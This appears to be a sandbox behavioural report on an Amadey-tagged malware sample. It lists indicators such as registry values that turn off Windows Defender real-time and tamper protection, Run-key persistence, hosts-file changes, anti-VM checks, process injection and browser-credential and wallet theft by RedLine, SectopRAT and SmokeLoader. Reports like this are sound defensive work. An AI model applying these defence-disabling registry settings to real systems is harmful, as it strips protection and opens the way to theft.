amadey | 38ca03f3e5bf9c4b45789d786b4ace3bb805df322b821f66bea8132c92fc1eea

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	70E9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	70E9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	70E9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	70E9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	70E9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	70E9.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral2/memory/2396-49-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/files/0x0006000000023296-355.dat	family_redline
behavioral2/files/0x0006000000023296-354.dat	family_redline
behavioral2/memory/6112-356-0x0000000000D20000-0x0000000000D5E000-memory.dmp	family_redline
behavioral2/memory/5284-567-0x00000000020A0000-0x00000000020FA000-memory.dmp	family_redline
behavioral2/memory/5232-586-0x0000000000C30000-0x0000000000C4E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/memory/5232-586-0x0000000000C30000-0x0000000000C4E000-memory.dmp	family_sectoprat
behavioral2/memory/1628-597-0x0000000002530000-0x0000000002540000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 4576 created 1980	4576	latestX.exe	76
PID 4576 created 1980	4576	latestX.exe	76
PID 4576 created 1980	4576	latestX.exe	76
PID 4576 created 1980	4576	latestX.exe	76
PID 4576 created 1980	4576	latestX.exe	76
PID 6024 created 1980	6024	updater.exe	76

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
5964	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	7446.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	CA37.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	5Rz2Qy4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	6C05.bat

Executes dropped EXE 34 IoCs

pid	Process
4600	bH1gI10.exe
2808	AT1uN32.exe
1124	Fu7AL29.exe
4380	1Ts56eD6.exe
2804	2Cj8454.exe
2020	3jI92EC.exe
2344	4Xj539Ng.exe
3884	5Rz2Qy4.exe
4792	6915.exe
3180	cP1QA9tD.exe
388	6AAD.exe
1644	rK2Hd6RC.exe
3320	ip7bl9qN.exe
3188	6C05.bat
3672	ny5xx7go.exe
4676	1RC28Vm9.exe
3776	6EF4.exe
5128	70E9.exe
5268	7446.exe
5356	explothe.exe
6112	2yq462Ma.exe
3976	CA37.exe
5972	toolspub2.exe
5796	31839b57a4f11171d6abc8bbc4451ee4.exe
5284	D11D.exe
5624	source1.exe
1628	D40C.exe
4576	latestX.exe
5232	DA47.exe
6108	explothe.exe
5888	toolspub2.exe
6024	updater.exe
5632	31839b57a4f11171d6abc8bbc4451ee4.exe
4056	explothe.exe

Loads dropped DLL 3 IoCs

pid	Process
5284	D11D.exe
5284	D11D.exe
1576	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	70E9.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	bH1gI10.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Fu7AL29.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	6915.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	rK2Hd6RC.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	ny5xx7go.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	cP1QA9tD.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	ip7bl9qN.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	AT1uN32.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4380 set thread context of 4112	4380	1Ts56eD6.exe	91
PID 2804 set thread context of 1048	2804	2Cj8454.exe	99
PID 2020 set thread context of 4968	2020	3jI92EC.exe	108
PID 2344 set thread context of 2396	2344	4Xj539Ng.exe	116
PID 388 set thread context of 5704	388	6AAD.exe	168
PID 4676 set thread context of 5796	4676	1RC28Vm9.exe	171
PID 3776 set thread context of 5340	3776	6EF4.exe	182
PID 5972 set thread context of 5888	5972	toolspub2.exe	210
PID 5624 set thread context of 1048	5624	source1.exe	213

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4700	sc.exe
5828	sc.exe
1492	sc.exe
5264	sc.exe
5348	sc.exe
5612	sc.exe
1784	sc.exe
6020	sc.exe
6080	sc.exe
3080	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
3796	4380	WerFault.exe	89
3828	2804	WerFault.exe	95
1064	1048	WerFault.exe	99
3320	2020	WerFault.exe	106
2640	2344	WerFault.exe	111
5760	388	WerFault.exe	146
5872	4676	WerFault.exe	152
5972	5796	WerFault.exe	171
5528	3776	WerFault.exe	154
5184	5284	WerFault.exe	199

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
5540	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4112	AppLaunch.exe
4112	AppLaunch.exe
4968	AppLaunch.exe
4968	AppLaunch.exe
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
1980	Explorer.EXE
2704	msedge.exe
2704	msedge.exe
3360	msedge.exe
3360	msedge.exe
1980	Explorer.EXE
1980	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1980	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4968	AppLaunch.exe
5888	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4112	AppLaunch.exe
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeDebugPrivilege	5128	70E9.exe
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
